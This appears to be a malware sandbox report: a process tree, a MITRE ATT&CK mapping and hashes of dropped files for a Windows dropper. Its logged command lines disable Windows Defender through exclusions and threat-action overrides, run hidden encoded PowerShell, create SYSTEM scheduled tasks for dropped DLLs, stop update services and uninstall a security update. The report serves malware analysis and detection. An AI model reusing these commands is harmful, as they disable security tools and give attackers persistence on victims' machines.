C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZzJFgnUaheUn" /t REG_DWORD /d 0 /reg:644⤵PID:848
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\efSuucJNImPU2" /t REG_DWORD /d 0 /reg:324⤵PID:1648
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\efSuucJNImPU2" /t REG_DWORD /d 0 /reg:644⤵PID:2696
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gWMsjtYByovYC" /t REG_DWORD /d 0 /reg:324⤵PID:2228
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gWMsjtYByovYC" /t REG_DWORD /d 0 /reg:644⤵PID:1844
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qfQXRdAKnlsTdhGWuTR" /t REG_DWORD /d 0 /reg:324⤵PID:2192
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qfQXRdAKnlsTdhGWuTR" /t REG_DWORD /d 0 /reg:644⤵PID:2936
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\voItHROCU" /t REG_DWORD /d 0 /reg:324⤵PID:3064
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\voItHROCU" /t REG_DWORD /d 0 /reg:644⤵PID:2724
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\WMmUhsrLoeNTYuVB" /t REG_DWORD /d 0 /reg:324⤵PID:2572
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\WMmUhsrLoeNTYuVB" /t REG_DWORD /d 0 /reg:644⤵PID:2260
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵PID:2552
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵PID:2240
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\xehfnPLREkljOutgp" /t REG_DWORD /d 0 /reg:324⤵PID:1964
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\xehfnPLREkljOutgp" /t REG_DWORD /d 0 /reg:644⤵PID:2356
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MlEwZvbgpCGVQFZq" /t REG_DWORD /d 0 /reg:324⤵PID:2036
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MlEwZvbgpCGVQFZq" /t REG_DWORD /d 0 /reg:644⤵PID:2904
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "IzaEPSfYdSgyWPrQW" /SC once /ST 12:43:27 /RU "SYSTEM" /TR "\"C:\Windows\Temp\MlEwZvbgpCGVQFZq\AweeICIOYFgLAjZ\eKfotrz.exe\" rc /hdBndidwX 385118 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1408
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "IzaEPSfYdSgyWPrQW"3⤵PID:1520
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2332 -s 6923⤵
- Loads dropped DLL
- Program crash
PID:1200
-
-
-
C:\Windows\Temp\MlEwZvbgpCGVQFZq\AweeICIOYFgLAjZ\eKfotrz.exeC:\Windows\Temp\MlEwZvbgpCGVQFZq\AweeICIOYFgLAjZ\eKfotrz.exe rc /hdBndidwX 385118 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1252 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:1344
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵PID:2492
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:2144
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵PID:844
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵PID:2524
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:772
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵PID:532
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵PID:1940
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:1644
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:2860
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵PID:1784
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:2800
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵PID:2984
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵PID:684
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵PID:2580
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2188 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵PID:2168
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bjPRdWxZxSSObMFEvg"3⤵PID:1844
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &3⤵PID:3064
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"4⤵PID:2068
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵PID:1600
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2116 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2332
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"4⤵PID:1648
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True5⤵PID:684
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2484 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1360
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\voItHROCU\WercCi.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "HsFIJVFBpaOiSlL" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2656
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "HsFIJVFBpaOiSlL2" /F /xml "C:\Program Files (x86)\voItHROCU\oCZcyXc.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2036
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "HsFIJVFBpaOiSlL"3⤵PID:2688
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "HsFIJVFBpaOiSlL"3⤵PID:608
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "WyOrfcWfrBamuS" /F /xml "C:\Program Files (x86)\efSuucJNImPU2\vqbYjOO.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2856
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "kiXxoUJRQWRVF2" /F /xml "C:\ProgramData\WMmUhsrLoeNTYuVB\BdFwVOC.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2444
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "BLlTsguLxEDntNTLH2" /F /xml "C:\Program Files (x86)\qfQXRdAKnlsTdhGWuTR\CYNtDAa.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1544
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "BtVMzXpXWmtubExaWQo2" /F /xml "C:\Program Files (x86)\gWMsjtYByovYC\zWZEdxk.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1188
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ceuxZEzDPWMxlYwWu" /SC once /ST 06:14:20 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\MlEwZvbgpCGVQFZq\NDFLPTka\unJPDFW.dll\",#1 /Isdidzg 385118" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1648
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ceuxZEzDPWMxlYwWu"3⤵PID:956
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "IzaEPSfYdSgyWPrQW"3⤵PID:1408
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1252 -s 8203⤵
- Program crash
PID:2264
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\MlEwZvbgpCGVQFZq\NDFLPTka\unJPDFW.dll",#1 /Isdidzg 3851182⤵PID:2996
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\MlEwZvbgpCGVQFZq\NDFLPTka\unJPDFW.dll",#1 /Isdidzg 3851183⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:3012 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ceuxZEzDPWMxlYwWu"4⤵PID:2748
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {77F115B5-F9BF-420A-8942-14C644204656} S-1-5-21-330940541-141609230-1670313778-1000:KXIPPCKF\Admin:Interactive:[1]1⤵PID:2312
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1104 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:432
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000021001\NewR.exeC:\Users\Admin\AppData\Local\Temp\1000021001\NewR.exe2⤵
- Executes dropped EXE
PID:1628
-
-
C:\Users\Admin\AppData\Local\Temp\1000021001\NewR.exeC:\Users\Admin\AppData\Local\Temp\1000021001\NewR.exe2⤵
- Executes dropped EXE
PID:2696
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2536
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "206008068842273681019451679891383241509625876203-1290935161118142053479355370"1⤵PID:804
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "196418973-787676710-196525475717017288657112988381034619333-561681179-316313217"1⤵PID:1704
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "771824492450891420342744751-5486615451780915604-1278505750595252130-472449284"1⤵PID:3052
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1429680680-17182443711508062415-13972106711161439393-1242758765410002219135429480"1⤵PID:2660
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-306036860894971555968315097864289163968313556754611209-1904493586-84139505"1⤵PID:2608
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-467245243-9374397711956447035-1468764268-1097237365-140835538617496279511986293282"1⤵PID:1336
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-2068728567-158193716-185916006-3611211402036837527951662413514555254-1189421263"1⤵PID:792
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1897650357-1172739207-1070910296840253665-1411970308-131462773914262749811179451879"1⤵PID:2240
-
C:\ProgramData\wikombernizc\reakuqnanrkn.exeC:\ProgramData\wikombernizc\reakuqnanrkn.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:2580 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2736
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:2056
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:1768
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:2836
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:2536
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:1372
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:936
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:1864
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵PID:1336
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵PID:2636
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵PID:2632
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵PID:2552
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:2260
-
-
C:\Windows\explorer.exeexplorer.exe2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1364
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1293376881-923550853-1964294879-4142339601237808265784672163-2896850231301033873"1⤵PID:2208
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1433754971-68370766021439518077274650-1702806205327733097-1613320957-1053332175"1⤵PID:2356
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-25616920521203797741104339275-576186153-111612996-1874243441-7798912651416506409"1⤵PID:432
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "160228067-522042314646046260117067417815763673107630604251840360304-1905412558"1⤵PID:532
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "13958300451458131771438943168966661192-252552355-277948965659220320-2131433752"1⤵PID:2800
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵PID:2696
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "13414635454767946471774590781467556206-1408628755-650884815-12201882421296621729"1⤵PID:684
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1System Services
2Service Execution
2Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Pre-OS Boot
1Bootkit
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Scheduled Task/Job
1Defense Evasion
Impair Defenses
2Disable or Modify Tools
1Modify Registry
4Pre-OS Boot
1Bootkit
1Subvert Trust Controls
1Install Root Certificate
1Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
190B
MD5ced3f3d1b1ee172658d683cca992ef98
SHA107fef9e7cb3fe374408b1bac16dbbfde029496e4
SHA2566c6630ff0be4775eac74682d1fd4a0de91fc3cf6c6fdeae1c8e9019828c542f8
SHA512de2b3ec20ad19676172b7779cd3ed3a7fcaf2a490c01849c47ed5505f7a4b32c429f56c8a8c3009bf5290055bd3d3eec49762e9b60b728414fb6686a54b1f6ca
-
Filesize
246B
MD5dfc82f7a034959dac18c530c1200b62c
SHA19dd98389b8fd252124d7eaba9909652a1c164302
SHA256f421332fd132d8405cad34871425c9922e4a1b172d74f86b9e4e7ee750205919
SHA5120acb2a043303ab1c033313d62b9b4dad8ca240e345195c87776f99f129a93946036835872b336a8efd996657c37acf56da7c01d68add340408e8fce72fc66fe5
-
Filesize
2.0MB
MD55151452773ad06bff359324f01337fca
SHA1dcc367b895f4c6f632ff74c0c927db88078c1540
SHA256ba9df06e4a2e05df764ee22c817f050f8cf92da65ac50f5ccafceecf004f2bca
SHA512a0384e7ac47b1a03b523c79563a6a9187fe220b7eac585100c27be82f3f49219432b6c43bfbb28a4570846ab9a9ebae20f426b9cfad09a102db61c2a3cfade19
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD563137ace6b33dc6439c87605c4d92210
SHA1ac0d55a40042485e8874fafe8758027b67dd40bc
SHA25648d8b8a48b35d1e80ad712210967841792d3ebe0496bb26a9ac1f0bb6ec99343
SHA5121f0fd3cdad8383c3c4cdd3740e9adfad4d22751f32f358e26465da3845ae37d831e9032128712f5e7b14dce663635151902d7423c48c5a76530c134fff66b09c
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD53c594f38a39b7f0b2bd9a9de1fc207f8
SHA1d78ec4b7ba828decfbf655f375b54d7576925d73
SHA2562dbc555cca97fe2de9f44a90cd990a1e6ce6bffea43f6034ec590bb784c9802e
SHA51295faf5bf7e67d731891a1b438ff76b93f9f915f1c93811597e4457f6be439cb62051df03ed0bea63c261fb2ea50ae3f0b40e4063c0741ce4a5a9ef5ae718dcdf
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5b35e0065c308207d6ad2e532ee997d4a
SHA181dddb9826826666591e4621a1afd60daf36a96a
SHA2568661c5789ee21de3094d9c541f78c4b647c07ccc4e083a5d10e44ed594a371a7
SHA512cf083f02c27994f573e18396f646aefca12fa99fea747935514c4df0de2e3184351735bd1cf256121c27e4d1218705f6e101ebcac9b615bfad6cc3158293ea17
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5f9310fdac651cb982d7559c93d475e4c
SHA1dcd7f31c9a928482d84b7ae43ca6d5777cdcc350
SHA25674f133dfa7ca5ec7eb2f847f88e88c2ac9f7f9fde6b0faf06345239fe05fe7f6
SHA512fcca55fc94b844f582f41b479155d75826204cc00112bcaeb2d93d6281c14875e07ab4dfa3140a3d7faf5b680071c473a9973407766c80dcf829b9795e4cf73d
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
9KB
MD56db8192ab53865e7f47394b89c63dc99
SHA1a08b809637be920ee522533e1e6231f00a11fdf4
SHA25685b1d45c4958402d90ee1f0773d8e8f90e5ab2cf284bd843b8d5d78003f3af85
SHA512bfc9689326b804f023e214df7f974b529f1c51b8bbdcaeb6f646e7a77b0770c7feb9e7b13d20762d30dfd7d94f58373dbab44fe35b2a628a1a367d9a7cbe8de5
-
Filesize
27KB
MD5f17c0b8747470b6212f57982f598169b
SHA19b8ced540809c69832400e7a56a042d61dfc6e32
SHA25620df1ed331cfa9199ea085ff9e83e3ab36d0d7e674d2bbe336d6f726b4eaf0d9
SHA512790fdfcd706ed857ebd9e85b35e90ca1bce5ce6be6f4e34e392dcb6c0c84e1e9e5ff2171b4ac765a65cfbeb5ca9a776ced2fbfa0a4a5e92c90cfecd7862b07e8
-
C:\Users\Admin\AppData\Local\Temp\[email protected]
Filesize653B
MD59762da1629c6f6e76282d00a0ecb3e23
SHA1ed5600013e3d8c29f1ed85e4dca58795b868f44e
